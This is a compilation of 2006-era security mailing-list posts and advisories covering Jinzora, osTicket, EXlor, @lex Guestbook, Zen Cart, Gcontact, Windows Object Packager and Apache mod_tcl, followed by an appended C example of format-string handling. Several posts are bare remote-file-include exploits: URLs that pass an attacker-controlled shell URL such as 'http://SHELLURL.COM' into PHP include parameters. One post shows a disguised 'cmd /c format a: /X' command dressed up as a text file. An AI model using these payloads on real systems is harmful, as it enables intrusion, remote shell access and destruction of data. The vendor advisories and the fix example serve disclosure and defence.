Spoofing security dialog in object packager - 2
A few months ago, I found that all versions of Windows XP are vulnerable: in Object Packager, if one created a command line, e.g. "format a: /X", and wanted to hide it, leave the icon and label to anything, really, and change the command line to 'cmd /c format a: /X > ..\security_log.txt'. It will appear as "security_log.txt" in the dialog, and will have the same icon, MIME type, description, etc. as a normal text file, but if you were to open it, it would pipe the results of "format a: /X" to something that is probably called "C:\docume~1\%username%\security_log.txt".
Jinzora 2.6 - Remote File Include Vulnerabilities
# ERNE ERNEALiZM THIS LOVE NEVER ENDS
# Jinzora 2.6 - Remote File Include Vulnerabilities
# site: Www.Hack-Medya.Org
# Script : http://www.jinzora.com/downloads/j2.6.zip
# Credits : ERNE
# Contact : [EMAIL PROTECTED]
# Thanks : Liz0zim, Bitter.Melish, D3ngsz, Rmx, Di_lejyoner, Xoron
# Vulnerable : http://www.site.com/[path]/extras/mt.php?web_root=[shell]
Re: Multiple XSS Vulnerabilities in Zen Cart 1.3.5
Full Disclosure

Armorize Technologies Security Advisory

Advisory No: Armorize-ADV-2006-0003
Status: Full
Date: 2006/9/27

Summary:
Armorize-ADV-2006-0003 discloses multiple cross-site scripting vulnerabilities that are found in Zen Cart, which is a PHP e-commerce shopping program built on a foundation of osCommerce GPL code. It provides an easy-to-set-up and run online store.

Affected Software:
Zen Cart 1.3.5
Zen Cart 1.3.2

Vulnerability Description:
Cross-Site Scripting

Analysis/Impact:
Privacy leakages from the client side may lead to session hijacking, identity theft and information theft.

Detection/Exploit (full):
http://www.example.com/[PATH]/login.php
POST variables admin_name and admin_pass are vulnerable.
http://www.example.com/[PATH]/password_forgotten.php
POST variable admin_email is vulnerable.

Protection/Solution:
1. Escape every questionable URI and HTML script.
2. Remove prohibited user input.

Disclosure Timeline:
2006/09/27 Published partial advisory; notified vendor
2006/09/29 Received request from Ian Wilson of Zen Cart for more details
2006/10/02 Zen Cart released official patch for this vulnerability
2006/10/04 Published full advisory
2006/10/14 Full disclosure at SecurityFocus mailing list

Credit:
Security Team at Armorize Technologies, Inc. ([EMAIL PROTECTED])

Additional Information:
Link to this Armorize advisory
http://www.armorize.com/advisory.php?Keyword=Armorize-ADV-2006-0003
Links to all Armorize advisories
http://www.armorize.com/advisory/
Links to Armorize vulnerability database
http://www.armorize.com/resources/vulnerability.php

Armorize Technologies is delivering the world's most advanced source code analysis solution for Web application security based on its award-winning and patent-pending verification technologies. Addressing security early in the software development life cycle (SDLC), Armorize CodeSecure proactively identifies and traces vulnerabilities in Web application source code, effectively hardening websites against today's ever growing security threats. CodeSecure's zero-false-positive accuracy, traceback support and Web 2.0-based interface make it the premium Web application security solution. For more information please visit: http://www.armorize.com.
WDT:- osTicket File Include all V
script:- osTicket Open Source Support Ticket System
site:- http://www.osticket.com
exploit by runvirus
http://www.host/path/include/open_form.php?include_dir=
welcome in www.sec-area.com
Re: Jax LinkLists Remote File include
This isn't a vuln, because in admin/linklists.admin.php, line 6, the variable $pathtoscript = "../"; is defined :)

xoron
Re: Secunia Research: Microsoft Windows Object Packager Dialog Spoofing
I knew about this particular flaw for some time. (Honestly, I found it by accident, like I think the security researcher from Secunia did... or maybe it leaked from where I posted it?!?!?!!! :P)

This could be a bit more critical if:

1) A '\' (not a '/') was placed at the end of the command line followed by an arbitrary name, which could be e.g. '\mypicture.bmp'. Then at the object icon a real BMP icon is set and the object name set to 'mypicture.bmp', so that the packager would precisely show only 'mypicture.bmp' at the warning message and not a part of the command line, as it would appear if a '/' was put instead of '\'.

2) Renaming the .RTF file to .WRI; that would make the file be opened in WordPad, since by default WRI files are opened in WordPad even with MS Word installed, and therefore not needing to embed a WordPad document in a Word / PowerPoint / Excel file, and then less user interaction would be required. Plus, if you embed a real picture in WordPad it does NOT show the picture, it shows the default icon for that kind of image, e.g. a BMP picture. MS Word, on the other hand, shows the picture inside the document, not an icon.

Well, don't panic, it is patched by now ;)
Re: DanPHPSupport => 0.5 Cross Site Scripting Vulnerabilities
This was fixed in DanPHPSupport 1.0
Multiple XSS Vulnerability in Gcontact
Armorize Technologies Security Advisory

Advisory No: Armorize-ADV-2006-0005
Status: Partial
Date: 2006/10/14

Summary:
Armorize-ADV-2006-0005 discloses multiple cross-site scripting vulnerabilities that are found in Gcontact, which is a Web based address book written in Ajax/PHP offering multi-user, multi-contacts (email, phone, icq, msn, ...) & multi-address for each person, birthday reminder by email, mailing-list management, Excel export, etc.

Affected Software:
Gcontact 0.6.5

Vulnerability Description:
Cross-Site Scripting

Analysis/Impact:
Allows malicious users to access restricted directories and/or view data outside the normal scope, which may lead to information theft and invasion of privacy.

Detection/Exploit (partial):
http://www.example.com/[PATH]/index.php

Protection/Solution:
1. Escape every questionable URI and HTML script.
2. Remove prohibited user input.

Credit:
Security Team at Armorize Technologies, Inc. ([EMAIL PROTECTED])

Additional Information:
Link to this Armorize advisory
http://www.armorize.com/advisory.php?Keyword=Armorize-ADV-2006-0005
Links to all Armorize advisories
http://www.armorize.com/advisory/
Links to Armorize vulnerability database
http://www.armorize.com/resources/vulnerability.php
Re: iDefense Security Advisory 10.11.06: Sun Microsystems Solaris NSPR Library Arbitrary File Creation Vulnerability
On Wed, 11 Oct 2006, iDefense Labs wrote:

> III. ANALYSIS
>
> Exploitation allows local attackers to elevate privileges to root.

http://www.0xdeadbeef.info/exploits/raptor_libnspr

Oldschool style ;)

I'll probably code a universal exploit using /etc/ld.so.preload next week... But now the weekend has landed!

--
Marco Ivaldi
Antifork Research, Inc.
http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233 0394 EF85 2008 DBFD B707
EXlor 1.0 (/fonctions/template.php) Remote File Include Vulnerability
-=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=-
EXlor 1.0 (/fonctions/template.php) Remote File Include Vulnerability
-=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=-
Source Code: http://www.comscripts.com/jump.php?action=script&id=1904
-=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=-
Vulnerable File: /fonctions/template.php
-=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=-
Vulnerable Code:
require ($repphp.'/cache/mot.cache.php');
-=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=-
line: 21
-=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=-
Exploit :
http://www.test.com/[liver_dor]/fonctions/template.php?repphp=shell.txt?
-=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=-
Discovered By : Mahmood_ali
Contact : HackEr_[at]w.cN
-=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=-
Special Greetings : Tryag-Team & Str0ke
-=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=-
@lex Guestbook <=(ModeliXe.php) Remote File Inclusion Exploit
#=== @lex Guestbook <= (ModeliXe.php) Remote File Inclusion Exploit
#===
# Bug in : ModeliXe.php
#
# Vuln Code :
#
# require_once($chem_modelixe.'Mxconf.php');
# require_once($chem_modelixe.'ErrorManager.php');
#
#===
#
# Exploit :
#
# http://sitename.com/[scriptPath]/templates/modelixe/Mxconf.php?chem_modelixe=http://SHELLURL.COM
#
#===
# Discovered By : MoHaNdKo
#
# Contact : xp1o (at) msn (dot) com [email concealed]
# or
# wWw.xP10.CoM & wWw.TRyaG.CoM
#
# Greetz : ( abo"ROOT SHELL " nora ) & 3abdalah & dr.7zn & mahmood_ali & ThE-WoLf-KsA & abu shad & v1per-haCker & MR.WOLF &
# abu melaf & mohagr22 & metoovet & fuck_net & hitler-jeddah & El3alMy & ToOoFA & Le CoPrA
# FaTaL & foz & elwa7sh elkasr & cRiMiNaL NeT
#
# and all members on xp10.com and tryag.com and lezr.com
#===
vendor: http://www.alexphpteam.com/telecharger/alex_guestbook4.zip
iDefense Security Advisory 10.13.06: Apache HTTP Server mod_tcl set_var Format String Vulnerability
Apache HTTP Server mod_tcl set_var Format String Vulnerability

iDefense Security Advisory 10.13.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 13, 2006

I. BACKGROUND

The mod_tcl module for the Apache httpd v2.x is a scripting module that allows a TCL developer to create server side script pages in TCL. It is available as a contrib package for several distributions. For more information, see http://tcl.apache.org/

II. DESCRIPTION

Remote exploitation of a format string vulnerability in the mod_tcl module for the Apache httpd v2.x could allow attackers to execute arbitrary code in the context of the httpd.

Due to programmer error, user supplied data is passed as the format string specifier to several calls to an internally defined variable argument function. The function 'set_var' is declared as follows:

mod_tcl.h:117:void set_var(Tcl_Interp *interp, char *var1, char *var2, const char *fmt, ...);

Several insecure calls to this function are made throughout the code, as seen below:

tcl_cmds.c:437: set_var(interp, nm_var, (char*) key, (char*) val);
tcl_cmds.c:2231:set_var(interp, nm_env, env[i], sptr + 1);
tcl_core.c:650: set_var(interp, namespc, vl[i].var2, vl[i].var3);

III. ANALYSIS

Successful exploitation allows remote attackers to gain local access to the vulnerable system in the context of the affected httpd. To exploit this vulnerability, the attacker must know the location of at least one tcl server script that is configured to use this module for processing.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in version 1.0 of mod_tcl for Apache 2.x.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

The Apache mod_tcl team has addressed this vulnerability with mod_tcl version 1.0.1. It is available from http://tcl.apache.org/mod_tcl/

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-4154 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

08/16/2006 Initial vendor notification
10/11/2006 Initial vendor response
10/13/2006 Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by Sparfell.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
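An added example in C (not iDefense's or mod_tcl's code) of the call-site pattern the advisory describes: a stand-in set_var whose last named parameter is a printf-style format, the unsafe call shape of tcl_cmds.c:2231 beside the constant-"%s" shape that removes the bug (the actual 1.0.1 patch is not on this page, so that fix shape is an assumption), and a small audit helper that flags a value carrying conversion directives before it reaches a format parameter. The Tcl interpreter is replaced by a plain output buffer.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define VAL_MAX 256

/* Stand-in for mod_tcl's set_var (assumption: the real one formats into a
   buffer for the Tcl interpreter). Everything after fmt is a format argument. */
static void set_var(char *out, const char *var, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, VAL_MAX, fmt, ap);
    va_end(ap);
}

/* Shape of the tcl_cmds.c:2231 call: the environment value lands in the fmt
   slot. Calling this with a value containing %n, %x, ... is undefined
   behaviour; it is kept only so the two call shapes can be compared. */
static void store_env_unsafe(char *out, const char *name, const char *value)
{
    set_var(out, name, value);
}

/* Fixed shape: constant "%s" format, untrusted value passed as an argument,
   so any '%' sequences in it are copied literally. */
static void store_env_safe(char *out, const char *name, const char *value)
{
    set_var(out, name, "%s", value);
}

/* Audit helper: returns 1 if s contains a conversion directive, i.e. a '%'
   followed by anything other than another '%' or the end of the string. */
static int has_format_directive(const char *s)
{
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        if (s[1] != '\0') return 1;
    }
    return 0;
}

int main(void)
{
    char out[VAL_MAX];
    store_env_safe(out, "HTTP_HOST", "%x.%x.%n");   /* constructed hostile value */
    printf("stored literally: %s\n", out);
    return 0;
}
```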